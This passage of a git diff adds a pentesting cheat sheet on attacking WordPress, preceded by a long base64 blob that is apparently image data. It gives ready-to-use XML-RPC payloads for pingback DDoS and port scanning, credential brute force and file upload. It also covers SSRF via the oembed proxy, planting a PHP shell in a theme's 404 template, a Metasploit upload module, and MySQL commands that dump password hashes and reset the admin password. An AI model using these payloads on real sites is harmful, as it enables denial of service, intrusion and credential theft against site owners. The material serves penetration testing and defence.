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)
+
+#### DDoS or port scanning
+
+If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.  
+This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** \(so a **DDoS** is caused in that location\) or you can use it to make **Wordpress** lo **scan** some internal **network** \(you can indicate any port\).
+
+```markup
+<methodCall>
+<methodName>pingback.ping</methodName>
+<params><param>
+<value><string>http://<YOUR SERVER >:<port></string></value>
+</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
+</value></param></params>
+</methodCall>
+```
+
+![](../../.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png)
+
+If you get **faultCode** with ****a value **greater** then **0** \(17\), it means the port is open.
+
+Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS.
+
+### wp-cron.php DoS
+
+This file usually exists under the root of the Wordpress site: `/wp-cron.php`  
+When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.  
+Also,  by default, the `wp-cron.php` is called on every page load \(anytime a client requests any Wordpress page\), which on high-traffic sites can cause problems \(DoS\).
+
+It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval \(without causing issues\).
+
+####  **Bruteforce**
+
+```markup
+<methodCall>
+<methodName>wp.getUsersBlogs</methodName>
+<params>
+<param><value>username</value></param>
+<param><value>password</value></param>
+</params>
+</methodCall>
+```
+
+![](../../.gitbook/assets/image%20%2890%29.png)
+
+![](../../.gitbook/assets/image%20%28224%29.png)
+
+Using the correct credentials you can upload a file. In the response the path will appears \([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)\)
+
+```markup
+<?xml version='1.0' encoding='utf-8'?>
+<methodCall>
+	<methodName>wp.uploadFile</methodName>
+	<params>
+		<param><value><string>1</string></value></param>
+		<param><value><string>username</string></value></param>
+		<param><value><string>password</string></value></param>
+		<param>
+			<value>
+				<struct>
+					<member>
+						<name>name</name>
+						<value><string>filename.jpg</string></value>
+					</member>
+					<member>
+						<name>type</name>
+						<value><string>mime/type</string></value>
+					</member>
+					<member>
+						<name>bits</name>
+						<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
+					</member>
+				</struct>
+			</value>
+		</param>
+	</params>
+</methodCall>
+```
+
+#### DDOS
+
+```markup
+<methodCall>
+    <methodName>pingback.ping</methodName>
+    <params>
+        <param><value><string>http://target/</string></value></param>
+        <param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
+    </params>
+</methodCall>
+```
+
+![](../../.gitbook/assets/image%20%28203%29.png)
+
+### /wp-json/oembed/1.0/proxy - SSRF
+
+Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ and the Worpress site may make a request to you.
+
+This is the response when it doesn't work:
+
+![](../../.gitbook/assets/image%20%28127%29.png)
+
+### SSRF
+
+{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
+
+This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
+
+## **Panel RCE**
+
+#### **Modifying a php from the theme used \(admin credentials needed\)**
+
+Appearance → Editor → 404 Template \(at the right\)
+
+Change the content for a php shell:
+
+![](../../.gitbook/assets/image%20%28125%29.png)
+
+Search in internet how can you access that updated page. In thi case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+
+### MSF
+
+You can use:
+
+```text
+use exploit/unix/webapp/wp_admin_shell_upload
+```
+
+to get a session.
+
+## POST
+
+Extract usernames and passwords:
+
+```text
+mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
+```
+
+Change admin password:
+
+```text
+mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
+```
+
+## \*\*\*\*
+
diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/physical-attacks/escaping-from-gui-applications/README.md
new file mode 100644
